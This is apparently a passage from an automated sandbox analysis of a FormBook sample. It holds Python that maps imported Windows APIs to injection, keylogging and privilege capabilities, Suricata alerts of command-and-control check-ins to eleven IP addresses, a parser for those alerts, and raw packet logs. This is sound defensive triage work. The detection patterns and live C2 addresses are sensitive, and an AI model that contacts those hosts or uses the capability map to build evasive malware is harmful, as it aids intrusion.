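    "process enumeration": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW", "EnumProcesses", "EnumProcessModules", "GetModuleBaseNameW"},
    "debugger / timing checks": {"IsDebuggerPresent", "OutputDebugStringW", "QueryPerformanceCounter", "GetTickCount"},
    "keyboard / clipboard capture": {"GetAsyncKeyState", "GetKeyState", "GetKeyboardState", "GetClipboardData", "OpenClipboard"},
    "input blocking / synthesis": {"BlockInput", "SendInput", "keybd_event", "mouse_event"},
    "token / privilege manipulation": {"AdjustTokenPrivileges", "OpenProcessToken", "DuplicateTokenEx", "CreateProcessAsUserW", "CreateProcessWithLogonW", "LogonUserW"},
    "runtime API resolution": {"GetProcAddress", "LoadLibraryA", "LoadLibraryW", "LoadLibraryExW"},
    "network (sockets / WinINet)": {"socket", "connect", "send", "recv", "InternetOpenW", "HttpOpenRequestW", "HttpSendRequestW", "FtpOpenFileW"},
}
# Finishers that complete a classic user-mode injection chain. ResumeThread
# alone is ambiguous (it is also used for ordinary process creation).
CLASSIC_FINISHERS = {"CreateRemoteThread", "SetThreadContext", "QueueUserAPC", "NtQueueApcThread"}


def parse_import_table(rows):
    """Return {dll (lower-case): [import names]} from flattened table rows."""
    table = {}
    for row in rows:
        m = ROW_RE.match(row.strip())
        if not m:
            raise ValueError(f"unrecognised import row: {row[:40]!r}")
        names = [n.strip() for n in m.group("imports").split(",") if n.strip()]
        table[m.group("dll").lower()] = names
    return table


def map_capabilities(table):
    """For every cluster with at least one hit, list which of its APIs the
    binary imports and which it does not (the gaps are often the finding)."""
    imported = {name for names in table.values() for name in names}
    caps = {}
    for label, apis in CAPABILITY_CLUSTERS.items():
        present = sorted(apis & imported)
        if present:
            caps[label] = {"present": present, "missing": sorted(apis - imported)}
    return caps


def injection_assessment(caps):
    """Classify the static injection surface. Write primitives without any
    classic finisher is the pattern to expect when the payload resolves APIs
    at runtime or uses direct syscalls, both of which the report flags."""
    write = caps.get("cross-process memory write", {}).get("present", [])
    finishers = set(caps.get("injection finisher (thread start / context / APC)", {}).get("present", []))
    if not write:
        return "no-injection-primitives"
    if CLASSIC_FINISHERS & finishers:
        return "classic-injection-chain"
    return "write-primitives-without-classic-finisher"


if __name__ == "__main__":
    caps = map_capabilities(parse_import_table(IMPORT_TABLE_EXCERPT))
    for label, hit in caps.items():
        print(f"{label}: present={hit['present']} missing={hit['missing']}")
    print("assessment:", injection_assessment(caps))
```

Run it against the full table above and the same picture holds: the dropper carries the memory-write primitives, the process enumeration and the anti-debug checks statically, while the thread-hijack and APC steps the sandbox observed are not in the import directory at all, so an import-only scanner would under-rate this sample.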
Language of compilation system | Country where language is spoken
English | Great Britain
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-24T05:07:05.833523+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49773 | 3.33.130.190 | 80 | TCP
2024-10-24T05:07:21.863488+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49863 | 75.2.103.23 | 80 | TCP
2024-10-24T05:07:24.527124+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49877 | 75.2.103.23 | 80 | TCP
2024-10-24T05:07:27.053173+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49893 | 75.2.103.23 | 80 | TCP
2024-10-24T05:07:29.719563+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49905 | 75.2.103.23 | 80 | TCP
2024-10-24T05:07:35.644896+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49938 | 161.97.168.245 | 80 | TCP
2024-10-24T05:07:38.176637+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49953 | 161.97.168.245 | 80 | TCP
2024-10-24T05:07:40.713014+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49967 | 161.97.168.245 | 80 | TCP
2024-10-24T05:07:43.225697+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49983 | 161.97.168.245 | 80 | TCP
2024-10-24T05:07:49.416387+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50011 | 65.21.196.90 | 80 | TCP
2024-10-24T05:07:52.010166+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50012 | 65.21.196.90 | 80 | TCP
2024-10-24T05:07:54.566470+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50013 | 65.21.196.90 | 80 | TCP
2024-10-24T05:07:57.197651+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50014 | 65.21.196.90 | 80 | TCP
2024-10-24T05:08:03.685063+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50015 | 107.148.177.200 | 80 | TCP
2024-10-24T05:08:06.229021+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50016 | 107.148.177.200 | 80 | TCP
2024-10-24T05:08:08.776049+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50017 | 107.148.177.200 | 80 | TCP
2024-10-24T05:08:11.307022+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50018 | 107.148.177.200 | 80 | TCP
2024-10-24T05:08:17.697644+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50019 | 91.212.26.5 | 80 | TCP
2024-10-24T05:08:20.260173+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50020 | 91.212.26.5 | 80 | TCP
2024-10-24T05:08:22.822828+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50021 | 91.212.26.5 | 80 | TCP
2024-10-24T05:08:25.369643+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50022 | 91.212.26.5 | 80 | TCP
2024-10-24T05:08:31.105671+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50023 | 3.33.130.190 | 80 | TCP
2024-10-24T05:08:33.649175+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50024 | 3.33.130.190 | 80 | TCP
2024-10-24T05:08:36.207471+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50025 | 3.33.130.190 | 80 | TCP
2024-10-24T05:08:38.749515+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50026 | 3.33.130.190 | 80 | TCP
2024-10-24T05:08:45.117275+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50027 | 154.23.184.194 | 80 | TCP
2024-10-24T05:08:47.744778+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50028 | 154.23.184.194 | 80 | TCP
2024-10-24T05:08:50.291549+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50029 | 154.23.184.194 | 80 | TCP
2024-10-24T05:08:52.838495+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50030 | 154.23.184.194 | 80 | TCP
2024-10-24T05:08:58.751482+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50031 | 63.250.47.57 | 80 | TCP
2024-10-24T05:09:01.315065+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50032 | 63.250.47.57 | 80 | TCP
2024-10-24T05:09:03.869861+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50033 | 63.250.47.57 | 80 | TCP
2024-10-24T05:09:06.409600+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50034 | 63.250.47.57 | 80 | TCP
2024-10-24T05:09:12.550119+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50035 | 104.21.78.104 | 80 | TCP
2024-10-24T05:09:15.127587+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50036 | 104.21.78.104 | 80 | TCP
2024-10-24T05:09:17.648214+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50037 | 104.21.78.104 | 80 | TCP
2024-10-24T05:09:20.182535+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50038 | 104.21.78.104 | 80 | TCP
2024-10-24T05:09:26.712802+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50039 | 68.66.226.116 | 80 | TCP
2024-10-24T05:09:29.234986+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50040 | 68.66.226.116 | 80 | TCP
2024-10-24T05:09:31.780953+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50041 | 68.66.226.116 | 80 | TCP
2024-10-24T05:09:33.834400+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50042 | 68.66.226.116 | 80 | TCP
2024-10-24T05:09:39.598001+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50043 | 13.248.169.48 | 80 | TCP
2024-10-24T05:09:42.147205+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50044 | 13.248.169.48 | 80 | TCP
2024-10-24T05:09:44.660193+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50045 | 13.248.169.48 | 80 | TCP
2024-10-24T05:09:47.242547+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50046 | 13.248.169.48 | 80 | TCP
2024-10-24T05:09:52.918186+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50047 | 3.33.130.190 | 80 | TCP
2024-10-24T05:09:55.447492+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50048 | 3.33.130.190 | 80 | TCP
2024-10-24T05:09:58.025622+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50049 | 3.33.130.190 | 80 | TCP
2024-10-24T05:10:00.778879+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50050 | 3.33.130.190 | 80 | TCP
2024-10-24T05:10:06.450223+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50051 | 3.33.130.190 | 80 | TCP
2024-10-24T05:10:08.993983+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50052 | 3.33.130.190 | 80 | TCP
2024-10-24T05:10:11.549562+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50053 | 3.33.130.190 | 80 | TCP
2024-10-24T05:10:14.590801+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50054 | 3.33.130.190 | 80 | TCP
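The alert rows above show the sample walking its configured host list: eleven distinct destinations, each receiving three POST check-ins (SID 2855464) followed by one GET (SID 2855465) roughly 2.5 seconds apart, with 3.33.130.190 contacted first and again at the end. Reading that cadence out of the flattened rows by hand is error-prone because the extracted text runs the last octet of the destination address into the port. The Python below is an added example of mine, not code from the report or from Suricata: it splits rows written in the flattened form above and profiles the check-in pattern per host. Two assumptions make the split unambiguous and are mine, not the report's: the sandbox client address is fixed to 192.168.2.4 (taken from the report's TCP table), and the destination port is restricted to a short allow-list of ports the capture used. The embedded rows are the first nine alerts of the table above.

```python
import re
from collections import OrderedDict
from datetime import datetime

# Excerpt of the report's Suricata alerts (first three C2 hosts), copied in the
# flattened form the extracted page uses: Timestamp, SID, Signature, Severity,
# Source IP, Source Port, Dest IP, Dest Port and Protocol run together.
SAMPLE_ALERT_LINES = [
    "2024-10-24T05:07:05.833523+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497733.33.130.19080TCP",
    "2024-10-24T05:07:21.863488+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44986375.2.103.2380TCP",
    "2024-10-24T05:07:24.527124+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44987775.2.103.2380TCP",
    "2024-10-24T05:07:27.053173+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44989375.2.103.2380TCP",
    "2024-10-24T05:07:29.719563+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44990575.2.103.2380TCP",
    "2024-10-24T05:07:35.644896+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449938161.97.168.24580TCP",
    "2024-10-24T05:07:38.176637+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449953161.97.168.24580TCP",
    "2024-10-24T05:07:40.713014+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449967161.97.168.24580TCP",
    "2024-10-24T05:07:43.225697+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449983161.97.168.24580TCP",
]

# Sandbox client address from the report's TCP table (assumption: one client).
# Fixing it removes the ambiguity between the source IP's last octet and port.
ANALYSIS_HOST = "192.168.2.4"

# "75.2.103.2380" could be .23 + port 80 or .238 + port 0, so the destination
# port is matched against an explicit allow-list (assumption: HTTP-ish ports).
KNOWN_DST_PORTS = ("80", "443", "8080")

# A strict octet keeps the regex from swallowing port digits into the address.
_OCTET = r"(?:25[0-5]|2[0-4]\d|1?\d?\d)"


def alert_pattern(analysis_host=ANALYSIS_HOST, dst_ports=KNOWN_DST_PORTS):
    return re.compile(
        r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d+[+-]\d{4})"
        r"(?P<sid>\d{7})"
        r"(?P<sig>ET\S* .+?)"          # non-greedy: stops where severity + client IP follow
        r"(?P<severity>[1-4])"
        r"(?P<src_ip>" + re.escape(analysis_host) + r")"
        r"(?P<src_port>\d{4,5})"
        r"(?P<dst_ip>(?:" + _OCTET + r"\.){3}" + _OCTET + r")"
        r"(?P<dst_port>" + "|".join(map(re.escape, dst_ports)) + r")"
        r"(?P<proto>TCP|UDP)$"
    )


def parse_alert(line, pattern=None):
    """Split one flattened alert row into typed fields."""
    m = (pattern or alert_pattern()).match(line.strip())
    if not m:
        raise ValueError(f"cannot split alert row: {line[:60]!r}")
    method = re.search(r"\((GET|POST)\)", m.group("sig"))
    return {
        "ts": datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%S.%f%z"),
        "sid": int(m.group("sid")),
        "sig": m.group("sig"),
        "severity": int(m.group("severity")),
        "method": method.group(1) if method else None,
        "src_ip": m.group("src_ip"),
        "src_port": int(m.group("src_port")),
        "dst_ip": m.group("dst_ip"),
        "dst_port": int(m.group("dst_port")),
        "proto": m.group("proto"),
    }


def parse_alerts(lines):
    pattern = alert_pattern()
    return [parse_alert(line, pattern) for line in lines]


def checkin_profile(alerts):
    """Group alerts by destination in first-seen order and record, per host,
    the HTTP method sequence, the SIDs that fired and the mean spacing between
    consecutive alerts (None when the host was hit only once)."""
    hosts = OrderedDict()
    for a in alerts:
        h = hosts.setdefault(a["dst_ip"], {"methods": [], "sids": set(), "times": []})
        h["methods"].append(a["method"])
        h["sids"].add(a["sid"])
        h["times"].append(a["ts"])
    for h in hosts.values():
        gaps = [(b - a).total_seconds() for a, b in zip(h["times"], h["times"][1:])]
        h["mean_gap_s"] = sum(gaps) / len(gaps) if gaps else None
        del h["times"]
    return hosts


def rotation_order(alerts):
    """Distinct C2 hosts in the order the sample contacted them."""
    return list(checkin_profile(alerts))


if __name__ == "__main__":
    for host, prof in checkin_profile(parse_alerts(SAMPLE_ALERT_LINES)).items():
        print(host, prof["methods"], sorted(prof["sids"]), prof["mean_gap_s"])
```

Feed it the whole table above and the per-host profiles are identical in shape, which is the point for triage: every one of the eleven addresses gets the same 3×POST + 1×GET burst, so the alert volume says nothing about which host is the live C2 and which are the decoys FormBook mixes into its host list; that has to come from the responses in the packet capture, not from the Suricata hit count.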
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 24, 2024 05:07:05.188875914 CEST | 49773 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 05:07:05.194566965 CEST | 80 | 49773 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 05:07:05.194845915 CEST | 49773 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 05:07:05.202687025 CEST | 49773 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 05:07:05.208282948 CEST | 80 | 49773 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 05:07:05.833090067 CEST | 80 | 49773 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 05:07:05.833292961 CEST | 80 | 49773 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 05:07:05.833523035 CEST | 49773 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 05:07:05.836081028 CEST | 49773 | 80 | 192.168.2.4 | 3.33.130.190
Oct 24, 2024 05:07:05.841598988 CEST | 80 | 49773 | 3.33.130.190 | 192.168.2.4
Oct 24, 2024 05:07:21.220949888 CEST | 49863 | 80 | 192.168.2.4 | 75.2.103.23
Oct 24, 2024 05:07:21.226654053 CEST | 80 | 49863 | 75.2.103.23 | 192.168.2.4
Oct 24, 2024 05:07:21.226744890 CEST | 49863 | 80 | 192.168.2.4 | 75.2.103.23
Oct 24, 2024 05:07:21.235543966 CEST | 49863 | 80 | 192.168.2.4 | 75.2.103.23
Oct 24, 2024 05:07:21.241142988 CEST | 80 | 49863 | 75.2.103.23 | 192.168.2.4
Oct 24, 2024 05:07:21.863424063 CEST | 80 | 49863 | 75.2.103.23 | 192.168.2.4
Oct 24, 2024 05:07:21.863487959 CEST | 49863 | 80 | 192.168.2.4 | 75.2.103.23
Oct 24, 2024 05:07:22.744611025 CEST | 49863 | 80 | 192.168.2.4 | 75.2.103.23
Oct 24, 2024 05:07:22.750190973 CEST | 80 | 49863 | 75.2.103.23 | 192.168.2.4
Oct 24, 2024 05:07:23.819245100 CEST | 49877 | 80 | 192.168.2.4 | 75.2.103.23
Oct 24, 2024 05:07:23.827471018 CEST | 80 | 49877 | 75.2.103.23 | 192.168.2.4
Oct 24, 2024 05:07:23.827593088 CEST | 49877 | 80 | 192.168.2.4 | 75.2.103.23
Oct 24, 2024 05:07:23.874382973 CEST | 49877 | 80 | 192.168.2.4 | 75.2.103.23
Oct 24, 2024 05:07:23.879810095 CEST | 80 | 49877 | 75.2.103.23 | 192.168.2.4
Oct 24, 2024 05:07:24.527021885 CEST | 80 | 49877 | 75.2.103.23 | 192.168.2.4
Oct 24, 2024 05:07:24.527123928 CEST | 49877 | 80 | 192.168.2.4 | 75.2.103.23
Oct 24, 2024 05:07:25.401155949 CEST | 49877 | 80 | 192.168.2.4 | 75.2.103.23
Oct 24, 2024 05:07:25.407089949 CEST | 80 | 49877 | 75.2.103.23 | 192.168.2.4
Oct 24, 2024 05:07:26.419121027 CEST | 49893 | 80 | 192.168.2.4 | 75.2.103.23
Oct 24, 2024 05:07:26.425160885 CEST | 80 | 49893 | 75.2.103.23 | 192.168.2.4
Oct 24, 2024 05:07:26.425502062 CEST | 49893 | 80 | 192.168.2.4 | 75.2.103.23
Oct 24, 2024 05:07:26.433362961 CEST | 49893 | 80 | 192.168.2.4 | 75.2.103.23
Oct 24, 2024 05:07:26.439445019 CEST | 80 | 49893 | 75.2.103.23 | 192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:26.439507961 CEST804989375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:26.439538002 CEST804989375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:26.439572096 CEST804989375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:26.445074081 CEST804989375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:26.445117950 CEST804989375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:26.445146084 CEST804989375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:26.445173979 CEST804989375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:26.445202112 CEST804989375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:27.052867889 CEST804989375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:27.053173065 CEST4989380192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:27.947740078 CEST4989380192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:27.954328060 CEST804989375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:29.020641088 CEST4990580192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:29.026498079 CEST804990575.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:29.026602983 CEST4990580192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:29.053287983 CEST4990580192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:29.059082031 CEST804990575.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:29.688046932 CEST804990575.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:29.719446898 CEST804990575.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:29.719563007 CEST4990580192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:29.720356941 CEST4990580192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:29.726100922 CEST804990575.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:34.757886887 CEST4993880192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:34.763264894 CEST8049938161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:34.763358116 CEST4993880192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:34.772094965 CEST4993880192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:34.777800083 CEST8049938161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:35.644646883 CEST8049938161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:35.644709110 CEST8049938161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:35.644896030 CEST4993880192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:35.789664984 CEST8049938161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:35.789743900 CEST4993880192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:36.275815964 CEST4993880192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:37.293979883 CEST4995380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:37.299680948 CEST8049953161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:37.299789906 CEST4995380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:37.308964968 CEST4995380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:37.314882994 CEST8049953161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:38.176356077 CEST8049953161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:38.176409960 CEST8049953161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:38.176636934 CEST4995380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:38.320411921 CEST8049953161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:38.320499897 CEST4995380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:38.822731018 CEST4995380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:39.841115952 CEST4996780192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:39.847037077 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:39.847129107 CEST4996780192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:39.856246948 CEST4996780192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:39.862169981 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:39.862211943 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:39.862240076 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:39.862268925 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:39.862322092 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:39.862349987 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:39.862376928 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:39.862869978 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:39.862898111 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:40.712903976 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:40.712956905 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:40.713013887 CEST4996780192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:40.842545986 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:40.843997955 CEST4996780192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:41.369765997 CEST4996780192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:42.387764931 CEST4998380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:42.393177986 CEST8049983161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:42.393276930 CEST4998380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:42.399188042 CEST4998380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:42.405255079 CEST8049983161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:43.225492954 CEST8049983161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:43.225532055 CEST8049983161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:43.225567102 CEST8049983161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:43.225600004 CEST8049983161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:43.225697041 CEST4998380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:43.225697041 CEST4998380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:43.349102020 CEST8049983161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:43.349257946 CEST4998380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:43.349981070 CEST4998380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:43.355384111 CEST8049983161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:48.469611883 CEST5001180192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:48.476108074 CEST805001165.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:48.476368904 CEST5001180192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:48.550262928 CEST5001180192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:48.556273937 CEST805001165.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:49.376538038 CEST805001165.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:49.416387081 CEST5001180192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:49.525388002 CEST805001165.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:49.525726080 CEST5001180192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:50.057034016 CEST5001180192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:51.103931904 CEST5001280192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:51.109760046 CEST805001265.21.196.90192.168.2.4
